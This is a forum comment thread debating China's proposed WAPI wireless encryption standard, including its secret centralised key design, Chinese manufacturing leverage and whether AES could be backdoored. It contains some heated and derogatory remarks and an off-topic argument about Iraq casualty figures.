Not really, what are you basing all that on? While certainly a lot is made in China, let's not pretend they're the only place in the world capable of making electronics, doubly so when wifi gear is really a tiny segment of the electronics market. After all, Taiwan is a perfect example of a country famous for its electronics industry, yet there's no way in hell they have any interest in pushing mainland China's interests.

Re:Raises interesting question

[dumb_jedi]

People, this is just silly. Yes, China manufactures a LOT of things, and do it for a fraction of the cost in developed countries. But we're NOT talking about steel or cars or airplanes here. It's just an AP. You can set up a production line in two months, and order our ICs and PCBs from a loooong list of countries. So no, the chinese pushing a law that requires all the equipment manufactured there to hav this standar and ONLY thins standar will simply scare away business. And they certainly don't want that.

Re:Raises interesting question

[Just+Some+Guy]

What if some day the Chinese decided that they're not going to produce devices that don't meet their standards?

Then world governments dictate that all WAPI-enabled router imports ship with an OpenVPN installer CD, and we all go the sane route of running trusted VPN software over untrusted open Wi-Fi connections.

Re:Raises interesting question

[evilviper]

What if some day the Chinese decided that they're not going to produce devices that don't meet their standards?

Then they'd lose out on the billions upon billions of dollars they're importing from the USA. Factories in Taiwan, S.Korea (and pretty much everywhere else in the world) would be brought back up to speed quickly, and be outputting wireless routers before the first non-standard Chinese routers actually hit the docks. And this is not to mention the fact that pretty much all wireless routers/APs and cards are easily firmware upgradable (including their encryption standard).

They have a lot more to lose out of the deal than we do.

Re:Raises interesting question

[popsicle67]

Remember, the chinese do not have a profit motive, they have a power motive so they could just corner the market by dropping prices until the competition screams. Think of the whole world and not just us for a minute, If price is the object then the rest of the world will go to the chinese standard in the scenario I have weaved and what will the US do? In the end there will be a few manufacturers who will license out to the chinese just to keep in the game and the rest will just die.

Re:Raises interesting question

[evilviper]

Remember, the chinese do not have a profit motive, they have a power motive so they could just corner the market by dropping prices until the competition screams.

Not true. Every laborer, manager, and owner is trying to make as much profit as they possibly can. China is NOT a socialist country.

The government has a lot of power, but they aren't going to cripple their own economy for a tiny bit of fleeting power. And that's exactly what starting to impose such regulations would do. As soon as there's a sign of this ANYWHERE, you'll see companies pulling out of China as quickly as they possibly can.

Re:Raises interesting question

[tbo]

After all, Taiwan is a perfect example of a country famous for its electronics industry, yet there's no way in hell they have any interest in pushing mainland China's interests.

You'd be surprised. The latest trend is for US companies to outsource manufacturing to Taiwanese companies, who in turn have moved their actual factories to mainland China (cheaper labor). Having lots of trade between Taiwan and the mainland is definitely in Taiwan's interest, as it reduces the chance of war.

Why do they need a separate encryption standard

[k1980pc]

when Mandarin or Cantonese is equally or more effective :)

It's actually very simple

[rewter]

It's actually very simple. Here's what they need to do in two simple steps:

1. They should tell all manufacturers of WLAN equipment that are based in China (90% or so of all wlan manufacturers) to implement WAPI (remember, they are in China so they have to do what their government asks them to or they will be down. Oh wait, it's not very much different in USA anyway.).

2. They should tell all manufacturers of WLAN equipment that are based in China to drop support for 802.11i, or whatever else shouldn't be there.

Now, after about a year or so they will have a de facto wireless encryption standard named WAPI. Like it or not, that's the most efficient way to do this.

Re:It's actually very simple

[WhiteWolf666]

If China did that, manufacturing would shift elsewhere. It is a mistake to think that in a globalized economy we are beholden to any one supplier.

India is the most likely candidate, but there isn't any reason we couldn't manufacture this stuff anywhere else, including the E.U. or good ole US of A.

Price would go up, sure. But we aren't _that_ beholden to the Chinese that we would stick to an inferior technology.

Imagine if China required all computer manufacturers to use home-built Dragon chips. All computer manufacturers would move to another country; its really just that simple.

Re:It's actually very simple

Price would go up, sure. But we aren't _that_ beholden to the Chinese that we would stick to an inferior technology. Thats how things are now.

Re:It's actually very simple

[newt0311]

actually I don't think it would. it took several years for China's manufacturing base to get built up and the only reason they were able to do this so quickly was because of the government indirectly pushing the issue and the abundance of super cheap labor. If it takes another few years for the manufacturing bases to shift, we would have just accepted the standard by then.

Re:openssl?

[HRogge]

It seems you have no idea what makes a good encryption standard today.

The only way to be sure that an encryption schema is good is to publish it so that thousands of scientists can look at it and search for problems. Better try to include the community into the developement process.

Your "security by obscurity" idea almost never worked...

I guess the Chinese aren't good diplomats

[m874t232]

I suspect lots of companies and people would have liked to stick it to the IEEE and Linksys, and if the Chinese had prepared their position well, negotiated carefully, and put in a good proposal for an open, patent-unencumbered, well-tested, and clean encryption standard, they could have won this debate.

I don't know what exactly they actually did, but from the strongly negative reactions, I'm concluding that they must have failed on not just one, but several of these points.

Re:I guess the Chinese aren't good diplomats

[WhiteWolf666]

What they did?

They proposed a secret standard, with a central key repository (located on Chinese government servers). Implementation of this standard was given to 12 Chinese companies, and developing any devices based on this standard requires partnering with these Chinese manufacturers.

It isn't patent-encumbered, but that's because its a secret, and patenting it would require releasing the details.

There isn't any debate to win. Not only is it proprietary versus open, its proprietary and exclusively controlled-and-licensed-and-manufactured by the Chinese government and Chinese state-owned companies.

Everything about WAPI is wrong.

Re:I guess the Chinese aren't good diplomats

[bombadier_beetle]

And keep in mind that "partnering" is Mandarin for "letting Chinese companies copy your technology."

The point of WEP and it's successors

The point of wireless encryption isn't to prevent anyone from sniffing the data. As soon as the data leaves the AP, it reverts to whatever form of traffic it was - POP, HTTP, HTTPS, FTP, whatever. The Chinese have more than enough access to intercept any network traffic in China in a centralized location; they don't have to sit outside your home sniffing wireless traffic.

I've always thought that WEP and it's like are overrated. If you want something to be secure, you need end-to-end encryption. You shouldn't be sending confidential data over _any_ part of the network, wireless or not, without a secure protocol like SSH or HTTPS. If you have end-to-end encryption, WEP becomes much less important.

Extra crackability may not be bad, from the Chinese point of view; control freaks try to get as much power as they can, and I can see some bureaucrat pushing for this just because. Just like in the US, where we have officials who say they absolutely need some new privacy-intrusive measure even though existing measures already cover everything they could legitimately want (like warrantless wiretapping - or CALEA).

Where's step 3?

Where's the part about figuring out why they rest of the world doesn't beat a path to their door to buy these?

I'm sure the rest of the aisian pacific rim manufacturers will be laughing all the way to the bank.

Its actually called..

..Chi-Fi

An informative article...

[wkcole]

EETimes did a fact-rich article in March. The first paragraph of the second page is most illuminating. It seems the "startup" that owns the secret encryption mechanism lacks any visible means of support, and it is a "spinoff" of a government body.

IMHO there is far too much polite gentility and benefit of the doubt shown in the media, and ISO, and WTO and even /. to the thugs who run China. There's no moral or technical equivalency involved here. The Chinese government presented WAPI late accompanied by protectionist threats and has been whining disingenuously about the world mistreating it in the process ever since. WAPI has received over 2 years of special treatment because the rest of the world relies on Chinese de facto slave labor to build its electronic goods. If the ISO process was being run honestly with a legitimate goal of defining a trustworthy secure standard that can be widely implemented in interoperable and competitive ways, WAPI would have been dismissed when first proposed.

Dropping the Bomb

[Doc+Ruby]

Walking out on negotiations might work when you're holding the nukes or the Tibet being discussed at a diplomatic meeting. But walking out on engineering standards meetings for consumer electronics seems more like giving up. Maybe when you're a mafia government that rules by decree with an iron fist, you can't tell the difference.

say whaaa?

[stewie's+deuce]

chinese encryption algorithm??? are you serious?? does anyone else here think its a bad idea to use an security algorithm from a group of people who have yet to invent/discover the fork??? and.. i ask that with great respect to those who actually TRIED to use chopsticks.. on second thought.... shit, throw a fortune cookie at it and see if the algorithm falls apart.. your fortune: "confusion says 'you key is bad.. you no enta hear..'"

Re:say whaaa?

[stewie's+deuce]

flamebait??? wow.. what humorless moderators we have here.. man...

Re:say whaaa?

No. It is not funny. I'm glad the moderators gave you a kick in the pants.

Dirty Secret of WAPI

WAPI Uses a cenralized authentification host, known to both the computer and router. Geee, I wonder why China likes this architecture. Guess who would have easy access to all the keys.

Of course, this also makes it a easy target for hackers. WAPI systems in general would prove juciy targets, either for DOS, or hacking.

AES is secure, there is no NSA backdoor. Of course the NSA may have a way to brute force it, we've all heard rumors of it. But they have to bruteforce each key of each router they want to listen in on.

The Chinese govt just has to walk up to the telecom owning the local auth host and say "Give us the keys" or "Let us listen in", and it's arbitrarily simple.

paranoia is irrelevant

[sepharious]

No one is going to use encryption from a communist country, end of story. They can try using a homegrown solution there but as the world ties closer together over time, they'll have to adopt more open standards or face the prospects of being incompatable.

Re:paranoia is irrelevant

>No one is going to use encryption from a communist country, end of story.

Oh yeah? Care to back that statement up?
For the record, I know that many sites in China use SecureShell to transmit data to and from customers (some of them outside China), and I have personally visited China and installed such a system. It's completely in the open that this is how it's set up, and these are high-visibility sites we're talking about.

Chinese - Encryption??

[krod4]

Goddamnit! Lets not let the chinese have any say in any encrypting of anything! Only us here in the good old US of A have the competence to make such systems!

Extremely unlikely

[Sycraft-fu]

The fact aside that AES was developed by non-US researchers, is open to the world, and has been extensively examined by the best cryptographers in the world it wouldn't make sense. The NSA's job is protecting US interests. Those interests include classified government data and US financial data, both of which AES is approved for. So for the NSA to know about a flaw but keep it secret would mean:

1) That the NSA was able to discover a flaw in AES before it was approved, even though no one else has ever come close in all the time it's been out.

2) They believe they are they are the only ones smart enough to ever find the flaw, and thus it's safe to allow out in the wild.

I just can't see that. While it's possible the SVR isn't as good as the NSA, fair bet they are pretty good and I can't see the NSA wanting to chance something like that. To make that kind of arrogant assumption would be pretty colossally stupid.

It's a pretty safe bet that AES is indeed secure. It has been extensively checked by all sorts of crypto heavy hitters, including the NSA, and they all have weighed in as saying it's secure. It's kinda like the open source idea. Sure you can't say for SURE there's no bugs, but if the code is open, and it's been reviewed for years (without changes) by the best of the best, you are as close to sure as you can get.

Re:Extremely unlikely

[Eivind]

We don't disagree. I already said I don't find it likely, just possible.

It's possible to win the national lottery 10 times in a row too. Or to crack AES by successfully guessing the correct key on the very first try.

Did they really think

[popsicle67]

Are the chinese so naive to think they are on a level field with the rest of the world. Do they really think that throwing tantrums will help them. The world, quite understandably, cringes everytime a deal with china has to be made. We all want to reap the rewards of a market that size but we are also loathe to keep making the same rationalizations over and over so we can sleep at night with the image of that student going under that tank.

That's AES

[Sycraft-fu]

As others noted, it's an open standard. Good encryption isn't developed behind closed doors, it is something that you have to have people beat on for years before you are convinced it's worthwhile. Well AES has been a standard as AES for 5 years, and the process for it to become the standard was another 5 years. In those 10 years it's been heavily examined, it's probably the most examined algorithm other than the orignal DES. Because of it's approval by the US government, and it's use in SSH/SSL it's of interest to a whole lot of people that it's secure. Thus far, it is.

Well my friend, that's as good as it gets in the crypto world. You can't prove (in the for-sure mathematical sense) that a crypto algorithm is secure. You can only test it extensively. That's been does with AES, and not just by the NSA.

I suppose there is an miniscule change that the NSA can crack AES when nobody else can, but in that case you are fucked anyway since that's what (new) SSL and SSH use anyhow.

Can't blame them

[WindBourne]

3 months ago, the Chinese president had to come to here and meet with Gates/Balmer and the CEO of Boeing, followed by W. Now, the feds have decided that it is okay to allow all sorts of dual use IP to go to china. It is certain that all this info and goods will make it into other companies.

hmm

1)the chinese are smart
2)the americans are not(except for the germans and chinese they imported)
3)The above mentioned protocols have been exploited in the past
4)the current american politics does raise suspision on everything made in america
5)the refusal to have some of the dns servers controlled outside the USA just prooves this.
6)the only people that have a problem with chinese technology is the USA
7)most europians would i bet be OK with using chinese technology since in a lot of cases it's light years ahead of the USA technology.
8)I SEE NO FREAKING PROBLEM IN USING DIFFERENT STANDARDS FROM DIFFERENT COUNTRIES.IN FACT this is a plus.It's like opensource...everyone contributes something and there 4 it's gonna be harder for someone to create and exploit it.

Re:hmm

The problem isn't the country. The problem is the centralised architecture, and the closed-ness of the design and implementation.

Re:hmm

[WhiteWolf666]

1) you are dumb
2) you don't understand the situation
3) you are blindly parroting anti-americanism as a defense of your ignorance
4) you bring up irrelevant anecdotes to prove your position
5) you are dumb
6) calling a secret, properitary technology a "standard" doesn't make it one.
7) i have been trolled. i should learn not to feed the trolls.

Not so

[Paul+Crowley]

As another comment mentioned, it was IBM who first invented DC. And DES is vulnerable to linear cryptanalysis, indicating that maybe that's something that got invented in the open community first.

I don't believe that they are way ahead of us these days. They invented SHA-1 - now we've broken it. Skipjack's margin of safety has been whittled down to nothing with Biham's "impossible differentials". Their proposal "double counter mode" was broken within 24 hours. I think the widespread idea that they are still decades ahead of us is pure myth.

Simply Put...

...it's one step of a POWER PLAY.

China wants to be even more of a commercial power than ever, using a dual communist-ideology/capitalist-practice strategy against the West to help the latter collapse upon itself.

There's no ideological closed-source vs. open-source face-off here; the Communists want to be in a position to control YOU and how you communicate. You all bitch about the NSA's telephone call pattern analysis - well, here's a REAL attempt to get the means to listen in on what you talk about, and to shut you up if what you say is "inconvenient" and "unfortunate."

Get this straight: the so-called People's Republic of China is an oligarchy whose stated ideology is diametrically opposed to how YOU (and I'm talking to you Slashdotters) behave. Unless and until another Tianamen uprising occurs - and succeeds - the communists remain our foes. Cordial ones, to be sure, but foes nonetheless.

To the expat above who whined about his/her material getting ripped off: Welcome to the joys of dealing with a 3rd world government, baby. You have no chance in hell of renumeration. Get used to it.

Very unlikely

[Paul+Crowley]

There's no room to hide a secret "back door" in AES. Every step of its design is clear and well justified. There are no special hidden tables to sneak a back door into. And the guys who invented it were Belgian.

The NSA gave their blessing to all five final candidates. It's wildly implausble that they can break them all.

Re:Very unlikely

[Eivind]

Ok. That's a valid point. I was thinking of the tweaks to DES-tables way-back-when. Yes, I'm aware that all later evidence suggest that this was done to protect against differential cryptoanalysis which apparently NSA knew about at DES design-time when nobody else did. (atleast nobody that's talking about it)

But you're rigth, there's no such arbitrary, unexplained table-tweaks in AES.

Reputable resource

[amightywind]

Maybe you should look at a more reputable resource as the original poster provided. Amnesty International reports the death toll under saddam as just over 17,000. I think you will find that is LESS than those slaughtered by "friendly" forces during the illegal invasion of Iraq...

It takes nerve to use reputable and Amnesty International in the same thought. The left will do anything to sabotage the great work of Iraqi Freedom, including fabricate statistics. Well, you are only off by a factor of 20. As for legality, I find the operation more palatable from a legal standpoint than the graft and corruption of the Oil for Food crimes that preceeded it.

Actually you are both wrong

The VERIFIED number of disappearances according to amnesty is 17,000, but may be much higher.
The VERIFIED number of civilians killed during the iraq war and subsequent occupation is 38355, but may be much higher.

According to various sources the mass graves do not contain the vastly inflated figure as mentioned in your previous quotes.
Additionally, many of the mass graves have been verified to stem from the previous war. Where they contain the bodies of those victims of the previous conflict.

Now, cant you both agree to disagree and shut the hell up! This sounds nothing like a WAPI discussion!!

MOD PARENT DOWN (and the other idiot/troll)